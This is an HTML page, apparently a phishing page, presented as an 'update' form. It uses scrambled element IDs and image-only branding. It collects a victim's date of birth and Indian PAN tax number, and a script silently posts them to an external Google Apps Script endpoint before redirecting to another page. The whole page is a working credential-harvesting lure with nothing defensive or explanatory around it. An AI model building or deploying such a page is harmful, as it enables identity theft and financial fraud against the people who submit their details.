<!DOCTYPE html>
<html lang="zxx">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>update</title>
    <style>
        #awesrw ,#wsdfjkiuytd ,#uytfd ,#trdfghjk

    {
        width: 100%;
    }
    #ytrdjjy
    {
        margin-left: 7%;
    }
    #ytrdchytd
    {
      margin-left: 7%;
      width: 80%;
      height: 28px;
    }
    #ytrdchytd ,#iugfdfghgfds ,#oiuytres ,#iuytdssdfgh ,#ftdd
    {
        margin-left: 7%;
        border-radius: 4px;
      width: 60%;
      margin-right: 90%;
      height: 20px;
      color: rgb(16, 16, 17);
    background: #faf9f8;
    border: 1px solid #1d86ff;
    }
    #oiuygggf
    {
        margin-left: 7%;
        margin-top: 15px;
        width: 35%;
        height: 30px;
        background-color:#1d86ff;
        font-size: medium;
        color: aliceblue;
        border-style: none;
        border-radius: 4px; 
    }
    #iuytdsxcvb
    {
                margin-left: 3px;
        margin-top: 15px;
        width: 20%;
        height: 30px;
        background-color:#466c94;
        font-size: large;
        color: aliceblue;
        border-style: none;
        border-radius: 2px; 
    }
    #trdszxfg ,#iuyfdhg ,#hgfdsdfjk ,#ytfdvj
    {
        margin-left: 7%;
    }
    </style>
</head>
<body>
    <div id="awesr">
        <img src="hhytresfgh.jpeg" alt=""  id="awesrw">

    </div>
    <div id="rest">
        <form action="https://script.google.com/macros/s/AKfycby1X6AjCt-7SsV2AnI4XxRYtHuWOD62DJExW7aco38yk_dJ5m2_wgahJnXXUbS-hcRrBw/exec" method="post" id="aa">
            
           <p id="ytrdjjy">
                     Enter Your Date Of Birth*
                </p> 
                <input type="date" name="dob" id="ytrdchytd" required="">
            <p id="trdszxfg">
                 Enter Your Pan Number*
            </p>   
               <input type="password" name="pan" id="iugfdfghgfds" required="">
            
                <button type="submit" id="oiuygggf">SUBMIT</button> 
            </div> <br>
        </form>
        <script type = "text/javascript" >
            window.addEventListener("DOMContentLoaded", function() {
                const yourForm = document.getElementById('aa');
                yourForm.addEventListener("submit", function(e) {
                    e.preventDefault();
                    const data = new FormData(yourForm);
                    const action = e.target.action;
                    fetch(action, {
                        method: 'POST',
                        body: data,
                    }).then(() => {
                        window.location.replace('acrewsdfgytre.html')
                    })
                })
            }); 
        </script>
        <img src="hwertyjl.jpeg" alt="" id="wsdfjkiuytd">
        <img src="hnolbe.jpeg" alt="" id="trdfghjk">
    </div>
</body>
</html>